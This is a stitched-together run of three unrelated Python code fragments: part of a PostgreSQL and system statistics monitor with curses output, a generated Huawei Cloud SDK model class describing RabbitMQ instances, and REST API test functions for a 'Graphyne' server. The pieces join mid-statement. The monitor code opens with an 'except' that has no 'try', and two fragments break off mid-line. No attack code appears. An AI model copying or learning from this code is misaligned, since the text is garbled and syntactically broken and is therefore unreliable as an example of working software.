import psycopg2
import psycopg2.extras
psycopg2_available = True
except ImportError:
psycopg2_available = False
try:
import curses
curses_available = True
except ImportError:
print('Unable to import ncurses, curses output will be unavailable')
curses_available = False
# enum emulation
def enum(**enums):
    """Build an ad-hoc enum-like class whose attributes are the given keyword constants."""
    members = dict(enums)
    return type('Enum', (), members)
class ColumnType(namedtuple('ColumnType', 'value header header_position')):
    """A rendered cell: its text value, the column header and where the header goes."""

    __slots__ = ()

    @property
    def length(self):
        """Total display width: the value plus, when a header is shown, the header and one separator."""
        if not self.header_position:
            return len(self.value)
        return len(self.value) + len(self.header) + 1
# column/cell status, alignment, value-type and header-placement "enums"
COLSTATUS = enum(cs_ok=0, cs_warning=1, cs_critical=2)
COLALIGN = enum(ca_none=0, ca_left=1, ca_center=2, ca_right=3)
COLTYPES = enum(ct_string=0, ct_number=1)
COLHEADER = enum(ch_default=0, ch_prepend=1, ch_append=2)
OUTPUT_METHOD = enum(console='console', json='json', curses='curses')
# field indices, presumably into /proc/<pid>/stat records — TODO confirm against callers
STAT_FIELD = enum(st_pid=0, st_process_name=1, st_state=2, st_ppid=3, st_start_time=21)
BLOCK_SIZE = 1024
MEM_PAGE_SIZE = resource.getpagesize()
# some global variables for keyboard output
freeze = False
filter_aux = True
autohide_fields = False
display_units = False
notrim = False
realtime = False
# validation functions for OUTPUT_METHOD
def get_valid_output_methods():
    """Return every output-method value exposed by OUTPUT_METHOD (lowercase attribute names only)."""
    return [OUTPUT_METHOD.__dict__[key]
            for key in OUTPUT_METHOD.__dict__.keys()
            if re.match(r'^[a-z][a-z_]+$', key)]
def output_method_is_valid(method):
    '''
    >>> output_method_is_valid('foo')
    False
    >>> output_method_is_valid('curses')
    True
    '''
    valid_methods = get_valid_output_methods()
    return method in valid_methods
def parse_args():
    '''parse command-line options'''
    # -H replaces the default -h for help, freeing -h for --host below
    parser = OptionParser(add_help_option=False)
    parser.add_option('-H', '--help', help='show_help', action='help')
    parser.add_option('-v', '--verbose', help='verbose mode', action='store_true', dest='verbose')
    parser.add_option('-i', '--instance', help='name of the instance to monitor', action='store', dest='instance')
    parser.add_option('-t', '--tick', help='tick length (in seconds)',
                      action='store', dest='tick', type='int', default=1)
    parser.add_option('-o', '--output-method', help='send output to the following source', action='store',
                      default=OUTPUT_METHOD.curses, dest='output_method')
    parser.add_option('-V', '--use-version',
                      help='version of the instance to monitor (in case it can\'t be autodetected)',
                      action='store', dest='version', type='float')
    parser.add_option('-l', '--log-file', help='direct log output to the file', action='store',
                      dest='log_file')
    parser.add_option('-R', '--reset-output', help='clear screen after each tick', action='store_true', default=False,
                      dest='clear_screen')
    parser.add_option('-c', '--configuration-file', help='configuration file for PostgreSQL connections',
                      action='store', default='', dest='config_file')
    parser.add_option('-P', '--pid', help='always track a given pid (may be used multiple times)',
                      action='append', type=int, default=[])
    parser.add_option('-U', '--username', help='database user name',
                      action='store', dest='username')
    parser.add_option('-d', '--dbname', help='database name to connect to',
                      action='store', dest='dbname')
    parser.add_option('-h', '--host', help='database connection host '
                      '(or a directory path for the unix socket connection)',
                      action='store', dest='host')
    parser.add_option('-p', '--port', help='database port number', action='store', dest='port')
    options, args = parser.parse_args()
    return options, args
# setup system constants
TICK_LENGTH = 1
output_method = OUTPUT_METHOD.curses
options = None  # filled in at startup (startup code not visible in this chunk)
logger = None   # module-wide logger, configured at startup
class StatCollector(object):
""" Generic class to store abstract function and data required to collect system statistics,
produce diffs and emit output rows.
"""
BYTE_MAP = [('TB', 1073741824), ('GB', 1048576), ('MB', 1024)]
USER_HZ = os.sysconf(os.sysconf_names['SC_CLK_TCK'])
RD = 1
NCURSES_DEFAULTS = {
'pos': -1,
'noautohide': False,
'w': 0,
'align': COLALIGN.ca_none,
'column_header': COLHEADER.ch_default,
}
NCURSES_CUSTOM_OUTPUT_FIELDS = ['header', 'prefix', 'prepend_column_headers']
    def __init__(self, ticks_per_refresh=1, produce_diffs=True):
        """Set up per-collector state.

        ticks_per_refresh -- refresh the data only every N ticks (see needs_refresh()).
        produce_diffs -- whether this collector emits per-interval diff rows.
        """
        # raw sample rows: previous snapshot, current snapshot and their diff
        self.rows_prev = []
        self.rows_cur = []
        self.time_diff = 0
        self.rows_diff = []
        # tick bookkeeping, advanced by tick()
        self.ticks = 0
        self.ticks_per_refresh = ticks_per_refresh
        self.diff_time = 0
        self._previous_moment = None
        self._current_moment = None
        self.produce_diffs = produce_diffs
        self.show_units = False
        self.ignore_autohide = True
        self.notrim = False
        # transformation data
        self.transform_dict_data = {}  # data to transform a dictionary input to the stat row
        self.transform_list_data = {}  # ditto for the list input
        # diff calculation data
        self.diff_generator_data = {}  # data to produce a diff row out of 2 input ones.
        self.output_transform_data = {}  # data to transform diff output
        # dispatch tables: one renderer per output method, plus per-method value "cooking"
        self.output_function = {OUTPUT_METHOD.console: self.console_output, OUTPUT_METHOD.json: self.json_output,
                                OUTPUT_METHOD.curses: self.ncurses_output}
        self.cook_function = {OUTPUT_METHOD.curses: self.curses_cook_value}
        self.ncurses_custom_fields = dict.fromkeys(StatCollector.NCURSES_CUSTOM_OUTPUT_FIELDS, None)
def postinit(self):
for l in [self.transform_list_data, self.transform_dict_data, self.diff_generator_data,
self.output_transform_data]:
self.validate_list_out(l)
self.output_column_positions = self._calculate_output_column_positions()
    def set_ignore_autohide(self, new_status):
        # when True, auto-hideable columns are shown regardless
        self.ignore_autohide = new_status
    def set_notrim(self, val):
        # when True, output values are not trimmed to fit the column width
        self.notrim = val
def _calculate_output_column_positions(self):
result = {}
for idx, col in enumerate(self.output_transform_data):
result[col['out']] = idx
return result
    def enumerate_output_methods(self):
        """Return the output methods this collector can render (keys of the renderer dispatch table)."""
        return self.output_function.keys()
@staticmethod
def exec_command_with_output(cmdline):
""" Execute comand (including shell ones), return a tuple with error code (1 element) and output (rest) """
proc = subprocess.Popen(cmdline, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
ret = proc.wait()
if ret != 0:
logger.info('The command {cmd} returned a non-zero exit code'.format(cmd=cmdline))
return ret, proc.stdout.read().strip()
@staticmethod
def validate_list_out(l):
""" If the list element doesn't supply an out column - remove it """
for col in l:
if 'out' not in col:
el = l.pop(l.index(col))
logger.error('Removed {0} column because it did not specify out value'.format(el))
@staticmethod
def ticks_to_seconds(tick_value_str):
return (float(tick_value_str) / StatCollector.USER_HZ if tick_value_str is not None else None)
@staticmethod
def bytes_to_mbytes(bytes_val):
return (float(bytes_val) / 1048576 if bytes_val is not None else None)
@staticmethod
def sectors_to_mbytes(sectors):
return (float(sectors) / 2048 if sectors is not None else None)
@staticmethod
def kb_to_mbytes(kb):
return (float(kb) / 1024 if kb is not None else None)
@staticmethod
def time_diff_to_percent(timediff_val):
return (float(timediff_val) * 100 if timediff_val is not None else None)
@staticmethod
def format_date_from_epoch(epoch_val):
lt = time.localtime(epoch_val)
today = time.localtime()
time_format_str = '%H:%M:%S'
if lt.tm_year != today.tm_year or lt.tm_mon != today.tm_mon or lt.tm_mday != today.tm_mday:
# only show minutes and seconds
time_format_str = '%m-%d %H:%M:%S'
# show full date
return time.strftime(time_format_str, time.localtime(epoch_val))
@staticmethod
def kb_pretty_print_long(b):
""" Show kb values in a human readable form. """
r = []
for l, n in StatCollector.BYTE_MAP:
d = b / n
if d:
r.append(str(d) + l)
b = b % n
return ' '.join(r)
@staticmethod
def kb_pretty_print(b):
""" Show memory size as a float value in the biggest measurement units """
r = []
v = 0
for l, n in StatCollector.BYTE_MAP:
if b > n:
v = round(float(b) / n, 1)
r.append(str(v) + l)
break
if len(r) == 0:
return '{0}KB'.format(str(b))
else:
return ' '.join(r)
    @staticmethod
    def time_interval_pretty_print(start_time, is_delta):
        '''Returns a human readable string that shows a time between now and the timestamp passed as an argument.
        The passed argument can be a timestamp (returned by time.time() call) a datetime object or a timedelta object.
        In case it is a timedelta object, then it is formatted only
        '''
        # normalize the argument into a timedelta
        if isinstance(start_time, Number):
            if is_delta:
                delta = timedelta(seconds=int(time.time() - start_time))
            else:
                delta = timedelta(seconds=start_time)
        elif isinstance(start_time, datetime):
            if is_delta:
                delta = datetime.now() - start_time
            else:
                delta = start_time
        elif isinstance(start_time, timedelta):
            delta = start_time
        else:
            raise ValueError('passed value should be either a number of seconds ' +
                             'from year 1970 or datetime instance of timedelta instance')
        delta = abs(delta)
        # split the sub-day remainder into hours / minutes / seconds
        secs = delta.seconds
        mins = int(secs / 60)
        secs %= 60
        hrs = int(mins / 60)
        mins %= 60
        hrs %= 24
        result = ''
        if delta.days:
            result += str(delta.days) + 'd'
        # hours are shown only when non-zero; minutes and seconds always, zero-padded
        if hrs:
            if hrs < 10:
                result += '0'
            result += str(hrs)
            result += ':'
        if mins < 10:
            result += '0'
        result += str(mins)
        result += ':'
        if secs < 10:
            result += '0'
        result += str(secs)
        if not result:
            # NOTE(review): minutes/seconds are appended unconditionally above, so
            # result is never empty and this millisecond fallback looks unreachable
            # — confirm before relying on 'ms' output.
            result = str(int(delta.microseconds / 1000)) + 'ms'
        return result
    @staticmethod
    def time_pretty_print(start_time):
        """Format an absolute time value (no 'now' subtraction)."""
        return StatCollector.time_interval_pretty_print(start_time, False)
    @staticmethod
    def delta_pretty_print(start_time):
        """Format the interval between now and the given moment."""
        return StatCollector.time_interval_pretty_print(start_time, True)
    @staticmethod
    def sectors_pretty_print(b):
        # 512-byte sectors: 2 sectors per KB, then reuse the KB formatter
        return StatCollector.kb_pretty_print(b * 2)
@staticmethod
def int_lower_than_non_zero(row, col, val, bound):
return val > 0 and val < bound
@staticmethod
def time_field_to_seconds(val):
result = 0
num = 0
accum_digits = []
semicolons_no = val.count(':')
for c in val:
if c.isdigit():
accum_digits.append(c)
else:
if len(accum_digits) > 0:
num = int(''.join(accum_digits))
if c == 'd':
num *= 86400
elif c == ':':
num *= 60 ** semicolons_no
semicolons_no -= 1
result += num
num = 0
accum_digits = []
return result
def time_field_status(self, row, col):
val = row[self.output_column_positions[col['out']]]
num = StatCollector.time_field_to_seconds(val)
if num <= col['critical']:
return {-1: COLSTATUS.cs_critical}
elif num <= col['warning']:
return {-1: COLSTATUS.cs_warning}
return {-1: COLSTATUS.cs_ok}
    @staticmethod
    def warn_non_optional_column(colname):
        """Log that a required column was absent from an input row."""
        logger.error('Column {0} is not optional, but input row has no value for it'.format(colname))
    def set_units_display(self, status):
        # toggle whether values are rendered together with their units
        self.show_units = status
    def needs_diffs(self):
        """ whether the collector needs diffs. It might not if it's not interested in them,
        or if it doesn't have data to produce them yet.
        """
        # note: returns the last truthy operand (possibly a rows list), not a strict bool
        return self.produce_diffs and self.rows_prev and self.rows_cur
    def tick(self):
        # advance the tick counter; needs_refresh() keys off this
        self.ticks += 1
    def needs_refresh(self):
        # refresh only once every ticks_per_refresh ticks
        return self.ticks % self.ticks_per_refresh == 0
    def refresh(self):
        # delegate to _do_refresh (defined elsewhere, not visible in this chunk) with no rows
        self._do_refresh(None)
def ident(self):
return str(self.__class__).lower().split('.')[-1].split('statcollector')[0]
def ncurses_set_prefix(self, new_prefix):
self.ncurses_custom_fields['prefix'] | |
# coding: utf-8
import pprint
import re
import six
class ListInstancesRespInstances:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'name': 'str',
'engine': 'str',
'engine_version': 'str',
'specification': 'str',
'storage_space': 'int',
'used_storage_space': 'int',
'connect_address': 'str',
'port': 'int',
'status': 'str',
'description': 'str',
'instance_id': 'str',
'resource_spec_code': 'str',
'charging_mode': 'int',
'vpc_id': 'str',
'vpc_name': 'str',
'created_at': 'str',
'user_id': 'str',
'user_name': 'str',
'order_id': 'str',
'maintain_begin': 'str',
'maintain_end': 'str',
'enable_publicip': 'bool',
'publicip_address': 'str',
'publicip_id': 'str',
'management_connect_address': 'str',
'ssl_enable': 'bool',
'enterprise_project_id': 'str',
'is_logical_volume': 'bool',
'extend_times': 'int',
'type': 'str',
'product_id': 'str',
'security_group_id': 'str',
'security_group_name': 'str',
'subnet_id': 'str',
'available_zones': 'list[str]',
'total_storage_space': 'int',
'storage_resource_id': 'str',
'storage_spec_code': 'str',
'service_type': 'str',
'storage_type': 'str',
'ipv6_enable': 'bool',
'ipv6_connect_addresses': 'list[str]'
}
attribute_map = {
'name': 'name',
'engine': 'engine',
'engine_version': 'engine_version',
'specification': 'specification',
'storage_space': 'storage_space',
'used_storage_space': 'used_storage_space',
'connect_address': 'connect_address',
'port': 'port',
'status': 'status',
'description': 'description',
'instance_id': 'instance_id',
'resource_spec_code': 'resource_spec_code',
'charging_mode': 'charging_mode',
'vpc_id': 'vpc_id',
'vpc_name': 'vpc_name',
'created_at': 'created_at',
'user_id': 'user_id',
'user_name': 'user_name',
'order_id': 'order_id',
'maintain_begin': 'maintain_begin',
'maintain_end': 'maintain_end',
'enable_publicip': 'enable_publicip',
'publicip_address': 'publicip_address',
'publicip_id': 'publicip_id',
'management_connect_address': 'management_connect_address',
'ssl_enable': 'ssl_enable',
'enterprise_project_id': 'enterprise_project_id',
'is_logical_volume': 'is_logical_volume',
'extend_times': 'extend_times',
'type': 'type',
'product_id': 'product_id',
'security_group_id': 'security_group_id',
'security_group_name': 'security_group_name',
'subnet_id': 'subnet_id',
'available_zones': 'available_zones',
'total_storage_space': 'total_storage_space',
'storage_resource_id': 'storage_resource_id',
'storage_spec_code': 'storage_spec_code',
'service_type': 'service_type',
'storage_type': 'storage_type',
'ipv6_enable': 'ipv6_enable',
'ipv6_connect_addresses': 'ipv6_connect_addresses'
}
def __init__(self, name=None, engine=None, engine_version=None, specification=None, storage_space=None, used_storage_space=None, connect_address=None, port=None, status=None, description=None, instance_id=None, resource_spec_code=None, charging_mode=None, vpc_id=None, vpc_name=None, created_at=None, user_id=None, user_name=None, order_id=None, maintain_begin=None, maintain_end=None, enable_publicip=None, publicip_address=None, publicip_id=None, management_connect_address=None, ssl_enable=None, enterprise_project_id=None, is_logical_volume=None, extend_times=None, type=None, product_id=None, security_group_id=None, security_group_name=None, subnet_id=None, available_zones=None, total_storage_space=None, storage_resource_id=None, storage_spec_code=None, service_type=None, storage_type=None, ipv6_enable=None, ipv6_connect_addresses=None):
    """ListInstancesRespInstances - a model defined in huaweicloud sdk"""
    # Snapshot the constructor arguments (minus self) in declaration order;
    # dicts preserve insertion order, so iteration matches the parameter list.
    arguments = dict(locals())
    del arguments['self']
    # Every private backing field starts out as None.
    for key in arguments:
        setattr(self, '_' + key, None)
    self.discriminator = None
    # Route each explicitly provided value through its property setter,
    # exactly as the original per-attribute `if x is not None: self.x = x`
    # boilerplate did; omitted (None) arguments are skipped.
    for key, argument in arguments.items():
        if argument is not None:
            setattr(self, key, argument)
@property
def name(self):
    """Gets the name of this ListInstancesRespInstances.

    Instance name.

    :return: The name of this ListInstancesRespInstances.
    :rtype: str
    """
    return self._name

@name.setter
def name(self, name):
    """Sets the name of this ListInstancesRespInstances.

    Instance name.

    :param name: The name of this ListInstancesRespInstances.
    :type: str
    """
    self._name = name
@property
def engine(self):
    """Gets the engine of this ListInstancesRespInstances.

    Message engine.

    :return: The engine of this ListInstancesRespInstances.
    :rtype: str
    """
    return self._engine

@engine.setter
def engine(self, engine):
    """Sets the engine of this ListInstancesRespInstances.

    Message engine.

    :param engine: The engine of this ListInstancesRespInstances.
    :type: str
    """
    self._engine = engine
@property
def engine_version(self):
    """Gets the engine_version of this ListInstancesRespInstances.

    Engine version.

    :return: The engine_version of this ListInstancesRespInstances.
    :rtype: str
    """
    return self._engine_version

@engine_version.setter
def engine_version(self, engine_version):
    """Sets the engine_version of this ListInstancesRespInstances.

    Engine version.

    :param engine_version: The engine_version of this ListInstancesRespInstances.
    :type: str
    """
    self._engine_version = engine_version
@property
def specification(self):
    """Gets the specification of this ListInstancesRespInstances.

    Instance specification. - For a single-node RabbitMQ instance: the VM specification. - For a RabbitMQ cluster: the VM specification and the node count.

    :return: The specification of this ListInstancesRespInstances.
    :rtype: str
    """
    return self._specification

@specification.setter
def specification(self, specification):
    """Sets the specification of this ListInstancesRespInstances.

    Instance specification. - For a single-node RabbitMQ instance: the VM specification. - For a RabbitMQ cluster: the VM specification and the node count.

    :param specification: The specification of this ListInstancesRespInstances.
    :type: str
    """
    self._specification = specification
@property
def storage_space(self):
    """Gets the storage_space of this ListInstancesRespInstances.

    Message storage space, in GB.

    :return: The storage_space of this ListInstancesRespInstances.
    :rtype: int
    """
    return self._storage_space

@storage_space.setter
def storage_space(self, storage_space):
    """Sets the storage_space of this ListInstancesRespInstances.

    Message storage space, in GB.

    :param storage_space: The storage_space of this ListInstancesRespInstances.
    :type: int
    """
    self._storage_space = storage_space
@property
def used_storage_space(self):
    """Gets the used_storage_space of this ListInstancesRespInstances.

    Used message storage space, in GB.

    :return: The used_storage_space of this ListInstancesRespInstances.
    :rtype: int
    """
    return self._used_storage_space

@used_storage_space.setter
def used_storage_space(self, used_storage_space):
    """Sets the used_storage_space of this ListInstancesRespInstances.

    Used message storage space, in GB.

    :param used_storage_space: The used_storage_space of this ListInstancesRespInstances.
    :type: int
    """
    self._used_storage_space = used_storage_space
@property
def connect_address(self):
    """Gets the connect_address of this ListInstancesRespInstances.

    IP address for connecting to the instance.

    :return: The connect_address of this ListInstancesRespInstances.
    :rtype: str
    """
    return self._connect_address

@connect_address.setter
def connect_address(self, connect_address):
    """Sets the connect_address of this ListInstancesRespInstances.

    IP address for connecting to the instance.

    :param connect_address: The connect_address of this ListInstancesRespInstances.
    :type: str
    """
    self._connect_address = connect_address
@property
def port(self):
    """Gets the port of this ListInstancesRespInstances.

    Port for connecting to the instance.

    :return: The port of this ListInstancesRespInstances.
    :rtype: int
    """
    return self._port

@port.setter
def port(self, port):
    """Sets the port of this ListInstancesRespInstances.

    Port for connecting to the instance.

    :param port: The port of this ListInstancesRespInstances.
    :type: int
    """
    self._port = port
@property
def status(self):
    """Gets the status of this ListInstancesRespInstances.

    Instance status. For details, see [Instance Status](https://support.huaweicloud.com/api-rabbitmq/rabbitmq-api-180514012.html).

    :return: The status of this ListInstancesRespInstances.
    :rtype: str
    """
    return self._status

@status.setter
def status(self, status):
    """Sets the status of this ListInstancesRespInstances.

    Instance status. For details, see [Instance Status](https://support.huaweicloud.com/api-rabbitmq/rabbitmq-api-180514012.html).

    :param status: The status of this ListInstancesRespInstances.
    :type: str
    """
    self._status = status
@property
def description(self):
    """Gets the description of this ListInstancesRespInstances.

    Instance description.

    :return: The description of this ListInstancesRespInstances.
    :rtype: str
    """
    return self._description

@description.setter
def description(self, description):
    """Sets the description of this ListInstancesRespInstances.

    Instance description.

    :param description: The description of this ListInstancesRespInstances.
    :type: str
    """
    self._description = description
@property
def instance_id(self):
    """Gets the instance_id of this ListInstancesRespInstances.

    Instance ID.

    :return: The instance_id of this ListInstancesRespInstances.
    :rtype: str
    """
    return self._instance_id

@instance_id.setter
def instance_id(self, instance_id):
    """Sets the instance_id of this ListInstancesRespInstances.

    Instance ID.

    :param instance_id: The instance_id of this ListInstancesRespInstances.
    :type: str
    """
    self._instance_id = instance_id
@property
def resource_spec_code(self):
"""Gets the resource_spec_code of this ListInstancesRespInstances.
资源规格标识。 - dms.instance.rabbitmq.single.c3.2u4g:RabbitMQ单机,vm规格2u4g - dms.instance.rabbitmq.single.c3.4u8g:RabbitMQ单机,vm规格4u8g - dms.instance.rabbitmq.single.c3.8u16g:RabbitMQ单机,vm规格8u16g - dms.instance.rabbitmq.single.c3.16u32g:RabbitMQ单机,vm规格16u32g - dms.instance.rabbitmq.cluster.c3.4u8g.3:RabbitMQ集群,vm规格4u8g,3个节点 - dms.instance.rabbitmq.cluster.c3.4u8g.5:RabbitMQ集群,vm规格4u8g,5个节点 - dms.instance.rabbitmq.cluster.c3.4u8g.7:RabbitMQ集群,vm规格4u8g,7个节点 - dms.instance.rabbitmq.cluster.c3.8u16g.3:RabbitMQ集群,vm规格8u16g,3个节点 - dms.instance.rabbitmq.cluster.c3.8u16g.5:RabbitMQ集群,vm规格8u16g,5个节点 - dms.instance.rabbitmq.cluster.c3.8u16g.7:RabbitMQ集群,vm规格8u16g,7个节点 - dms.instance.rabbitmq.cluster.c3.16u32g.3:RabbitMQ集群,vm规格16u32g,3个节点 - dms.instance.rabbitmq.cluster.c3.16u32g.5:RabbitMQ集群,vm规格16u32g,5个节点 - dms.instance.rabbitmq.cluster.c3.16u32g.7:RabbitMQ集群,vm规格16u32g,7个节点
:return: The resource_spec_code of this | |
to be fully up before continuing
while serverStartupStatus != 200:
try:
#urllib GET request
statusRequest = urllib.request.urlopen(statusURL)
serverStartupStatus = statusRequest.code
except Exception as e:
if currTime > timeoutVal:
#We have reached timeout and the server is not started
raise e
if e.code == 503:
time.sleep(10.0)
currTime = currTime + 10
elif e.code == 500:
raise e
except Exception as e:
testResult = False
Graph.logQ.put( [logType , logLevel.DEBUG , method , "exiting"])
resultSet = []
testResult = str(testResult)
expectedResult = str('True')
expectedCodeS = convertIntListToString(expectedCode)
statusString = "Expected Status: %s, Status: %s" %(expectedCodeS, serverStartupStatus)
results = [1, testcase, testResult, expectedResult, [statusString]]
resultSet.append(results)
return resultSet
def testServerAPIAdminStop(testcase, expectedCode, serverURL = None):
    """
    Check to see that the server status works.
    This test stops a currently running server

    Test Cases:
        testcase = "simplestop"
        expectedResult = [200]
        #Should always return 503, because the server has not yet started

        testcase = "already stopping"
        expectedResult = [202, 200]
        #Might return 200, depending on how quickly the server stops.  Otherwise, 202
    """
    method = moduleName + '.' + 'testServerAPIAdminStop'
    Graph.logQ.put( [logType , logLevel.DEBUG , method , "entering"])
    testResult = True
    serverStartupStatus = None
    statusURL = serverURL + "/admin/stop"
    try:
        #urllib GET request
        statusRequest = urllib.request.urlopen(statusURL)
        serverStartupStatus = statusRequest.code
    except urllib.error.HTTPError as e:
        # HTTPError must be handled before URLError (it is a subclass of it).
        # Previously the URLError handler swallowed HTTP errors and failed the
        # test even when the status code (e.g. 202) was in expectedCode.
        serverStartupStatus = e.code
        if e.code not in expectedCode:
            testResult = False
    except urllib.error.URLError as e:
        # Connection-level failure: server unreachable, refused, DNS, etc.
        testResult = False
        serverStartupStatus = e.reason
    except Exception as e:
        # Anything unexpected (bad URL arithmetic, etc.) is a failure too;
        # keep the message for the report instead of discarding it.
        testResult = False
        serverStartupStatus = str(e)
    Graph.logQ.put( [logType , logLevel.DEBUG , method , "exiting"])
    resultSet = []
    testResult = str(testResult)
    expectedResult = str('True')
    expectedCodeS = convertIntListToString(expectedCode)
    statusString = "Expected Status: %s, Status: %s" %(expectedCodeS, serverStartupStatus)
    results = [1, testcase, testResult, expectedResult, [statusString]]
    resultSet.append(results)
    return resultSet
def testServerAPICreateEntityFromMeme(serverURL = None, memePath = "Graphyne.Generic"):
    """
    Tests the /modeling/createEntityFromMeme/<memePath>
        1 - Create an entity of meme type memePath using /modeling/createEntityFromMeme/<memePath>
    """
    method = moduleName + '.' + '/modeling/createEntityFromMeme/<memePath>'
    Graph.logQ.put( [logType , logLevel.DEBUG , method , "entering"])
    testResult = True
    createEntityURL = serverURL + "/modeling/createEntityFromMeme/%s" %memePath
    notes = ""
    try:
        #urllib GET request; the response body is not needed for this test
        urllib.request.urlopen(createEntityURL)
    except urllib.error.URLError as e:
        testResult = False
        notes = e.reason
    except Exception as e:
        testResult = False
        # was silently discarded; keep the failure details for the report
        notes = str(e)
    # Log "exiting" like the sibling API tests do.
    Graph.logQ.put( [logType , logLevel.DEBUG , method , "exiting"])
    resultSet = []
    testResult = str(testResult)
    expectedResult = str('True')
    results = [1, "Create entity and retrieve type", testResult, expectedResult, [notes]]
    resultSet.append(results)
    return resultSet
def testServerAPIGetEntityMemeType(serverURL = None, memePath = "Graphyne.Generic"):
    """
    Tests the /modeling/createEntityFromMeme/<memePath> and /modeling/getEntityMemeType/<entityUUID> REST API calls
        1 - Create an entity of meme type memePath using /modeling/createEntityFromMeme/<memePath>
        2 - Given the UUID returned from the first call, request its type via /modeling/getEntityMemeType/<entityUUID>
        3 - the returned type should be the same as the original memePath
    """
    method = moduleName + '.' + '/modeling/createEntityFromMeme/<memePath>'
    Graph.logQ.put( [logType , logLevel.DEBUG , method , "entering"])
    testResult = True
    createEntityURL = serverURL + "/modeling/createEntityFromMeme/%s" %memePath
    notes = ""
    createResponse = None
    try:
        #urllib GET request
        createResponse = urllib.request.urlopen(createEntityURL)
    except urllib.error.URLError as e:
        testResult = False
        notes = e.reason
    except Exception as e:
        testResult = False
        notes = str(e)
    if createResponse is not None:
        # Only continue when the create call succeeded; previously a failed
        # create left createResponse unbound and raised NameError below.
        createResponseJsonB = createResponse.read()
        entityUUIDJson = json.loads(createResponseJsonB)
        getEntityMemeTypeURL = serverURL + "/modeling/getEntityMemeType/%s" %entityUUIDJson["entityUUID"]
        try:
            #urllib GET request
            getTypeResponse = urllib.request.urlopen(getEntityMemeTypeURL)
            getTypeResponseJsonB = getTypeResponse.read()
            getTypeResponseJson = json.loads(getTypeResponseJsonB)
            entityType = getTypeResponseJson["memeType"]
            if entityType != memePath:
                testResult = False
                notes = "Meme type returned = %s.  Should be %s" %(entityType, memePath)
        except Exception as e:
            testResult = False
            notes = str(e)
    Graph.logQ.put( [logType , logLevel.DEBUG , method , "exiting"])
    resultSet = []
    testResult = str(testResult)
    expectedResult = str('True')
    results = [1, "Create entity and retrieve type", testResult, expectedResult, [notes]]
    resultSet.append(results)
    return resultSet
def testServerAPIGetEntityMetaMemeType(serverURL = None, memePath = "Graphyne.Generic", metaMemePath = "Graphyne.GenericMetaMeme"):
    """
    Tests the /modeling/createEntityFromMeme/<memePath> and /modeling/getEntityMetaMemeType/<entityUUID> REST API calls
        1 - Create an entity of meme type memePath using /modeling/createEntityFromMeme/<memePath>
        2 - Given the UUID returned from the first call, request its meta meme type via /modeling/getEntityMetaMemeType/<entityUUID>
        3 - the returned type should be the same as metaMemePath
    """
    method = moduleName + '.' + '/modeling/createEntityFromMeme/<memePath>'
    Graph.logQ.put( [logType , logLevel.DEBUG , method , "entering"])
    testResult = True
    createEntityURL = serverURL + "/modeling/createEntityFromMeme/%s" %memePath
    notes = ""
    createResponse = None
    try:
        #urllib GET request
        createResponse = urllib.request.urlopen(createEntityURL)
    except urllib.error.URLError as e:
        testResult = False
        notes = e.reason
    except Exception as e:
        testResult = False
        notes = str(e)
    if createResponse is not None:
        # Only continue when the create call succeeded; previously a failed
        # create left createResponse unbound and raised NameError below.
        createResponseJsonB = createResponse.read()
        entityUUIDJson = json.loads(createResponseJsonB)
        getEntityMetaMemeTypeURL = serverURL + "/modeling/getEntityMetaMemeType/%s" %entityUUIDJson["entityUUID"]
        try:
            #urllib GET request
            getTypeResponse = urllib.request.urlopen(getEntityMetaMemeTypeURL)
            getTypeResponseJsonB = getTypeResponse.read()
            getTypeResponseJson = json.loads(getTypeResponseJsonB)
            # NOTE(review): the key 'mmetaMmeType' looks misspelled, but it may
            # match a misspelled key emitted by the server - confirm before renaming.
            entityType = getTypeResponseJson["mmetaMmeType"]
            if entityType != metaMemePath:
                testResult = False
                notes = "Meta Meme type returned = %s.  Should be %s" %(entityType, metaMemePath)
        except Exception as e:
            testResult = False
            notes = str(e)
    Graph.logQ.put( [logType , logLevel.DEBUG , method , "exiting"])
    resultSet = []
    testResult = str(testResult)
    expectedResult = str('True')
    results = [1, "Create entity and retrieve type", testResult, expectedResult, [notes]]
    resultSet.append(results)
    return resultSet
def testServerAPIGetEntitiesByMemeType(serverURL = None, memePath = "Graphyne.Generic"):
    """
    Tests the /modeling/getEntitiesByMemeType/<memePath>
        1 - Create an entity, using /modeling/createEntityFromMeme/
        2 - Get the entities of that type, using /modeling/getEntitiesByMemeType
        3 - Make sure that the entity created in step 1 is in the list.
    """
    method = moduleName + '.' + '/modeling/getEntitiesByMemeType/<memePath>'
    Graph.logQ.put( [logType , logLevel.DEBUG , method , "entering"])
    testResult = True
    createEntityURL = serverURL + "/modeling/createEntityFromMeme/%s" %memePath
    getEntityURL = serverURL + "/modeling/getEntitiesByMemeType/%s" %memePath
    notes = ""
    entityID = None
    try:
        #urllib GET request
        createResponse = urllib.request.urlopen(createEntityURL)
        createResponseJsonB = createResponse.read()
        entityUUIDJson = json.loads(createResponseJsonB)
        entityID = entityUUIDJson["entityUUID"]
    except urllib.error.URLError as e:
        testResult = False
        notes = e.reason
    except Exception as e:
        testResult = False
        # generic exceptions have no .reason attribute; the old handler crashed here
        notes = str(e)
    if testResult != False:
        try:
            #urllib GET request
            getResponse = urllib.request.urlopen(getEntityURL)
            getResponseJsonB = getResponse.read()
            getUUIDJson = json.loads(getResponseJsonB)
            entityIDList = getUUIDJson["entityIDList"]
            if entityID not in entityIDList:
                # The whole point of the test: absence must FAIL it, not just
                # annotate the notes (previously testResult was left True).
                testResult = False
                entityIDListS = ", ".join(entityIDList)
                notes = "Entity %s was %s" %(entityID, entityIDListS)
        except urllib.error.URLError as e:
            testResult = False
            notes = e.reason
        except Exception as e:
            testResult = False
            notes = str(e)
    Graph.logQ.put( [logType , logLevel.DEBUG , method , "exiting"])
    resultSet = []
    testResult = str(testResult)
    expectedResult = str('True')
    results = [1, "Check to see if entity is in list of type", testResult, expectedResult, [notes]]
    resultSet.append(results)
    return resultSet
def testServerAPIGetEntitiesByMetaMemeType(serverURL = None, memePath = "Graphyne.Generic", metaMemePath = "Graphyne.GenericMetaMeme"):
    """
    Tests the /modeling/getEntitiesByMetaMemeType/<memePath>
        1 - Create an entity, using /modeling/createEntityFromMeme/
        2 - Get the entities of that type, using /modeling/getEntitiesByMetaMemeType
        3 - Make sure that the entity created in step 1 is in the list.
    """
    method = moduleName + '.' + '/modeling/getEntitiesByMetaMemeType/<memePath>'
